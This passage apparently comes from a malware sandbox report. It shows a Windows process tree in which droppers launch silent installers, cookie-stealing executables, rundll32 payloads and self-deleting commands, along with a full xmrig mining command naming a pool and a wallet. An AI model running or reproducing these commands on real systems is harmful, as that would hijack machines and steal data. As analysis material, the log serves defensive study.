                                                                                                                                                              PID:7052
                                                                                                                                                              • C:\Program Files\Windows Mail\MVJUWLQAMG\irecord.exe
                                                                                                                                                                "C:\Program Files\Windows Mail\MVJUWLQAMG\irecord.exe" /VERYSILENT
                                                                                                                                                                12⤵
                                                                                                                                                                  PID:6088
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-JGT3A.tmp\irecord.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-JGT3A.tmp\irecord.tmp" /SL5="$703E2,6139911,56832,C:\Program Files\Windows Mail\MVJUWLQAMG\irecord.exe" /VERYSILENT
                                                                                                                                                                    13⤵
                                                                                                                                                                      PID:4204
                                                                                                                                                                      • C:\Program Files (x86)\recording\i-record.exe
                                                                                                                                                                        "C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                        14⤵
                                                                                                                                                                          PID:3420
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\f3-e6d61-14e-249ae-4ef50c94f2758\Giloqutofa.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\f3-e6d61-14e-249ae-4ef50c94f2758\Giloqutofa.exe"
                                                                                                                                                                      12⤵
                                                                                                                                                                        PID:3336
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1d-5b929-597-a19a1-2c46f2667198c\Wysharadishae.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1d-5b929-597-a19a1-2c46f2667198c\Wysharadishae.exe"
                                                                                                                                                                        12⤵
                                                                                                                                                                          PID:1132
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2x5ktxd5.iil\sskiper.exe /s & exit
                                                                                                                                                                            13⤵
                                                                                                                                                                              PID:7808
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2x5ktxd5.iil\sskiper.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\2x5ktxd5.iil\sskiper.exe /s
                                                                                                                                                                                14⤵
                                                                                                                                                                                  PID:1712
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fopovuip.3b4\KiffMainE1.exe & exit
                                                                                                                                                                                13⤵
                                                                                                                                                                                  PID:3920
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\fopovuip.3b4\KiffMainE1.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\fopovuip.3b4\KiffMainE1.exe
                                                                                                                                                                                    14⤵
                                                                                                                                                                                      PID:3556
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cuc5cck1.ibe\001.exe & exit
                                                                                                                                                                                    13⤵
                                                                                                                                                                                      PID:4452
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\cuc5cck1.ibe\001.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\cuc5cck1.ibe\001.exe
                                                                                                                                                                                        14⤵
                                                                                                                                                                                          PID:8132
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oan1hhri.2bo\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                        13⤵
                                                                                                                                                                                          PID:7984
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\oan1hhri.2bo\installer.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\oan1hhri.2bo\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                            14⤵
                                                                                                                                                                                              PID:7216
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c3kitagt.jfu\gpooe.exe & exit
                                                                                                                                                                                            13⤵
                                                                                                                                                                                              PID:8128
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\c3kitagt.jfu\gpooe.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\c3kitagt.jfu\gpooe.exe
                                                                                                                                                                                                14⤵
                                                                                                                                                                                                  PID:228
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                      PID:1616
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                        PID:2516
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\czjp0jqq.bwt\sskiper.exe /s & exit
                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                      PID:1352
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\czjp0jqq.bwt\sskiper.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\czjp0jqq.bwt\sskiper.exe /s
                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                          PID:3384
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5x5b2ajr.3ai\google-game.exe & exit
                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                          PID:6276
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5x5b2ajr.3ai\google-game.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\5x5b2ajr.3ai\google-game.exe
                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                              PID:5456
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yqcq2v2i.zwx\askinstall39.exe & exit
                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                              PID:5760
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\yqcq2v2i.zwx\askinstall39.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\yqcq2v2i.zwx\askinstall39.exe
                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                  PID:6832
                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe"
                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                          PID:1928
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\LSSLTdZ5VWAAnQoU6YqEPnYv.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\LSSLTdZ5VWAAnQoU6YqEPnYv.exe"
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                              PID:7136
                                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -u -p 7136 -s 1512
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                PID:4276
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\GYfFzyWHl6rXN4GHkMzqRX4a.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\GYfFzyWHl6rXN4GHkMzqRX4a.exe"
                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                PID:1552
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\xmrig.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\xmrig.exe" -p trinity-miner --donate-level 5 -o pool.supportxmr.com:443 -u 89UyhNJWGyP6xoycGBA3A6HjdNEs7g3jr34EXVtqGYzg5wLEbmZY2AcGy5Kw5NRfjaYTUyW1dKCHGinv7fGMg45zVCRQwNM -k --tls
                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                    PID:4996
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\35qKKZmi4huGY0q5ykpAPPaz.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\35qKKZmi4huGY0q5ykpAPPaz.exe"
                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                    PID:1548
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Bl6d1t1oe0z1aFaRz0obKWLb.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Bl6d1t1oe0z1aFaRz0obKWLb.exe"
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                      PID:6364
                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\setup.exe
                                                                                                                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\setup.exe"
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                          PID:6564
                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                          "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                            PID:5884
                                                                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\ifhvvyy.exe
                                                                                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\ifhvvyy.exe"
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                              PID:6668
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                  PID:5772
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                    PID:6664
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                      PID:6648
                                                                                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\pwang.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\pwang.exe"
                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                      PID:5960
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                          PID:5236
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\bMEjOahaUnAZ4GDXFrgvDhtH.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\bMEjOahaUnAZ4GDXFrgvDhtH.exe"
                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                        PID:6196
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{CdXl-QdiNU-VbOF-YG47f}\68782072665.exe"
                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                            PID:4636
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\{CdXl-QdiNU-VbOF-YG47f}\68782072665.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\{CdXl-QdiNU-VbOF-YG47f}\68782072665.exe"
                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                PID:6656
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\{CdXl-QdiNU-VbOF-YG47f}\68782072665.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\{CdXl-QdiNU-VbOF-YG47f}\68782072665.exe"
                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                    PID:6880
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{CdXl-QdiNU-VbOF-YG47f}\56960371542.exe" /mix
                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                  PID:2424
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\{CdXl-QdiNU-VbOF-YG47f}\56960371542.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\{CdXl-QdiNU-VbOF-YG47f}\56960371542.exe" /mix
                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                      PID:4348
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{CdXl-QdiNU-VbOF-YG47f}\84484220115.exe" /mix
                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                      PID:5660
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\{CdXl-QdiNU-VbOF-YG47f}\84484220115.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\{CdXl-QdiNU-VbOF-YG47f}\84484220115.exe" /mix
                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                          PID:7064
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 756
                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            PID:5008
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 768
                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            PID:3376
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 916
                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            PID:5920
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 1216
                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            PID:5960
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 1512
                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            PID:7764
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 1544
                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            PID:8060
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\nailedp\edspolishpp.exe
                                                                                                                                                                                                                                                            edspolishpp.exe
                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                              PID:7420
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "bMEjOahaUnAZ4GDXFrgvDhtH.exe" /f & erase "C:\Users\Admin\AppData\Roaming\bMEjOahaUnAZ4GDXFrgvDhtH.exe" & exit
                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                            PID:6880
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              taskkill /im "bMEjOahaUnAZ4GDXFrgvDhtH.exe" /f
                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                              PID:6180
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\US9hHmr3c7pTtXP4AceWW69P.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\US9hHmr3c7pTtXP4AceWW69P.exe"
                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                            PID:6332
                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\file4.exe"
                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                PID:2804
                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\pub02.exe
                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\pub02.exe"
                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                  PID:1572
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\Company\NewProduct\pub02.exe"
                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                      PID:4452
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 3
                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                        PID:4616
                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\toolspab2.exe
                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\toolspab2.exe"
                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                      PID:5232
                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\toolspab2.exe
                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\toolspab2.exe"
                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                          PID:5660
                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\KiffApp2.exe
                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\KiffApp2.exe"
                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                          PID:6160
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\8ZwTJBxusK3Wu46eVGLEOjsx.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\8ZwTJBxusK3Wu46eVGLEOjsx.exe"
                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                          PID:6292
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\di5qjPVYr9NgX21k5AnlwTTD.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\di5qjPVYr9NgX21k5AnlwTTD.exe"
                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                            PID:6264
                                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                PID:6296
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Uv9xuDdXTuggqOBsGBy2hYe5.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Uv9xuDdXTuggqOBsGBy2hYe5.exe"
                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                PID:6240
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{oiqS-3SyCD-KQGE-0bXC3}\61581964550.exe"
                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                    PID:5956
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\{oiqS-3SyCD-KQGE-0bXC3}\61581964550.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\{oiqS-3SyCD-KQGE-0bXC3}\61581964550.exe"
                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                        PID:4932
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\{oiqS-3SyCD-KQGE-0bXC3}\61581964550.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\{oiqS-3SyCD-KQGE-0bXC3}\61581964550.exe"
                                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                                            PID:4520
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{oiqS-3SyCD-KQGE-0bXC3}\71983125873.exe" /mix
                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                          PID:5636
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\{oiqS-3SyCD-KQGE-0bXC3}\71983125873.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\{oiqS-3SyCD-KQGE-0bXC3}\71983125873.exe" /mix
                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                            PID:4236
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 600
                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                              PID:6080
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 612
                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                              PID:3168
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 628
                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                              PID:6724
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 656
                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                              PID:2808
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 668
                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                              PID:5504
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{oiqS-3SyCD-KQGE-0bXC3}\46413099307.exe" /mix
                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                          PID:5540
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\{oiqS-3SyCD-KQGE-0bXC3}\46413099307.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\{oiqS-3SyCD-KQGE-0bXC3}\46413099307.exe" /mix
                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                              PID:4088
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 756
                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                PID:6184
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 768
                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                PID:6772
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 932
                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                PID:4736
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 1212
                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                PID:5032
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 1540
                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                PID:7872
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 1568
                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                PID:8092
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\nailedp\edspolishpp.exe
                                                                                                                                                                                                                                                                                                edspolishpp.exe
                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                  PID:7456
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "Uv9xuDdXTuggqOBsGBy2hYe5.exe" /f & erase "C:\Users\Admin\AppData\Roaming\Uv9xuDdXTuggqOBsGBy2hYe5.exe" & exit
                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                PID:3624
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                  taskkill /im "Uv9xuDdXTuggqOBsGBy2hYe5.exe" /f
                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                  PID:7040
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\y5UJhS45QEvhg7Fup1GMG58C.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\y5UJhS45QEvhg7Fup1GMG58C.exe"
                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                PID:6400
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\oCtGC7lbjqXK3xZxQaCRwuUj.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\oCtGC7lbjqXK3xZxQaCRwuUj.exe"
                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                  PID:6260
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\xnLlH93CjRbULjTcyt4LEvJA.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\xnLlH93CjRbULjTcyt4LEvJA.exe"
                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                    PID:6496
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\xnLlH93CjRbULjTcyt4LEvJA.exe
                                                                                                                                                                                                                                                                                                      "{path}"
